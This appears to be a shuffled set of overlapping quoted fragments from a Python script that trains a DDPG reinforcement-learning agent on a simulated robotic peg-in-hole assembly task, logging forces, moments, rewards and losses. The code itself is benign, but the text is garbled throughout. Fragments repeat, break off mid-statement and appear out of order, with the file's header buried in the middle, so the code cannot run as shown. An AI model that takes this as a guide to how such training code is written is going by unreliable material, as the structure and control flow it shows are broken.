a single worker\"\"\" # if rank == 0:", "exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if", "compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in env\"\"\"", "\"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else:", "0 # episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" # if", "0. q_value = 0. done = False forcement = [] Last_average_reward = 0.", "reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0. q_value", "\"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\"", "= pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) #", "from mpi4py import MPI import numpy as np import pandas as pd \"\"\"First", "only for a single worker\"\"\" # if rank == 0: # saver =", "env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time =", "epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset()", "mpi_sum import baselines.common.tf_util as U import tensorflow as tf from mpi4py import MPI", "saver = tf.train.Saver() # else: # saver = None # eval_episode_rewards_history = deque(maxlen=100)", "# forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch ==", "\"\"\"Set up logging stuff only for a single worker\"\"\" # if rank ==", "# episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce()", "= mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses)", "epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr", "= 0 # episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" #", "== 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles", "+ 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step", "force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6])", "\"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. episode_discount_reward = 0.", "pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward)", "the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore()", "env.pull_up() # True env # # if pull_safe is False: # logger.info('Peg-in-hole assembly", "print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle ==", "0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by", "+= r delta = r - Long_term_reward # if memory.nb_entries >= batch_size and", "\"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not", "position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al =", "tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore)", "Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in", "gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if", "0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(),", "------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import time from collections", "# print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle", "Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\"", "epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward", "range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] ==", "= mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] =", "actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None,", "1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for", "and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) #", "episode_reward = 0. episode_discount_reward = 0. q_value = 0. done = False forcement", "calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1 /", "reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set", "# Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0:", "new_obs, done) obs = new_obs \"\"\"Episode done and start pull the pegs step", "force!!!') # pull_done = False # while pull_done is False and info: #", "action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False):", "logger.info('Pull up the pegs failed for the exceed force!!!') # exit() break \"\"\"Episode", "nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise,", "epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward", "env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma *", "action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r,", "# pull_done = False # while pull_done is False and info: # pull_done,", "episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3])))", "steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps):", "= tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset()", "statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] =", "added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns,", "start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward)", "episode_step = 0 # episodes = 0 # t = 0 \"\"\"Force calibration\"\"\"", "agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time", "= None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess:", "gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\"", "of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps)", "executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim,", "batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2,", "logdir = logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'): with", "step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1", "assembly failed for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value)", "None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward", "# eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\"", "Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render:", "Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\"", "logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import", "break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps -", "nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al)", "+ 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done", "is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done = False", "obs = new_obs \"\"\"Episode done and start pull the pegs step by step\"\"\"", "pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\",", "env # pull_done, pull_safe = env.pull_up() #True env # # if pull_safe is", "gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \"", "\"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim", "epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save the", "apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in", "saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False)", "and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f)", "and start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!')", "-0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action))", "mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic']", "pull_done is False and info: # pull_done, pull_safe = env.step_up() #Simulation env #", "gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale,", "epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while pull_done is False", "pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit()", "\"\"\"Episode done and start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole", "by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the exceed force!!!')", "the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards),", "q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action", "18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import", "force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout", "f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as", "logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and logdir:", "# episode_step = 0 # episodes = 0 # t = 0 \"\"\"Force", "episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver =", "Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs", "mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions)", "env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) #", "tf from mpi4py import MPI import numpy as np import pandas as pd", "critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs =", "import pickle import sys from baselines import logger from simulation_ddpg import DDPG from", "critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50,", "r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not None:", "epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions", "-0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory", "= r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: #", "-0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent", "the pegs failed for the exceed force!!!') # exit() break \"\"\"Episode failed and", "combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train", "\" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r -", "- 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model", "episodes = 0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is", "1) if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1:", "t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode", "Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta)", "agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff", "False: logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done = False #", "maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward #", "'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env,", "action, r, new_obs, done) obs = new_obs \"\"\"Episode done and start pull the", "'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir,", "time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()):", "actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps,", "+ str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta", "enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver =", "break \"\"\"Episode failed and start pull the pegs step by step\"\"\" if info", "pull the pegs step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed", "info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True", "combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] =", "restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up", "= 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate =", "= env.pull_up() # True env # # if pull_safe is False: # logger.info('Peg-in-hole", "if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The", "for a single worker\"\"\" # if rank == 0: # saver = tf.train.Saver()", "= False forcement = [] Last_average_reward = 0. Number_episodes = 0. for t_rollout", "coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME>", "model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns,", "# env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6])", "[] Last_average_reward = 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next", "# while pull_done is False and info: # pull_done, pull_safe = env.step_up() #Simulation", "agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done and start pull", ">= batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the", "mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance']", "0 # t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: #", "agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics.", "# t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit()", "hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and", "episode_discount_reward = 0. q_value = 0. done = False forcement = [] Last_average_reward", "re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False)", "DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg,", "if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if", "pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env", "tf.train.Saver() # else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history =", "statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model", "index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key])", "env # # if pull_safe is False: # logger.info('Pull up the pegs failed", "pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',',", "assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs,", "exceed force!!!') # exit() break \"\"\"Episode failed and start pull the pegs step", "f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f: pickle.dump(eval_env.get_state(),", "done) obs = new_obs \"\"\"Episode done and start pull the pegs step by", "pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env #", "= {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the", "reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma,", "force!!!') # exit() break \"\"\"Episode failed and start pull the pegs step by", "mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward),", "t = 0 \"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate", "memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr,", "logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done =", "range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if", "[] Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch", "pegs failed for the exceed force!!!') # exit() break \"\"\"Episode failed and start", "logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps", "import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U", "normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size,", "= Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole", "path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise,", "epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size", "in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0]", "pickle import sys from baselines import logger from simulation_ddpg import DDPG from util", "import logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum", "and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() #", "epoch_start_time stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] =", "failed and start pull the pegs step by step\"\"\" if info is False:", "+ str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward # if memory.nb_entries", "pull_done is False and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe", "times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the", "model for nb_train_steps times\"\"\" for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr)", "from collections import deque import pickle import sys from baselines import logger from", "exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = []", "mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time()", "= tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\" # if", "'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step =", "= [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs =", "np import pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def", "= mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] =", "epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6])", "epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments", "= DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise,", "logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging", "= [] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs):", "t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement,", "while pull_done is False and info: # pull_done, pull_safe = env.step_up() # pull_done,", "mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\"", "The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward", "{} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean", "= [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr /", "= mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] =", "mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\" combined_stats['train/loss_actor'] = mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save", "Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1:", "= tf.train.Saver() # else: # saver = None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history", "env.save_figure('force_moment') 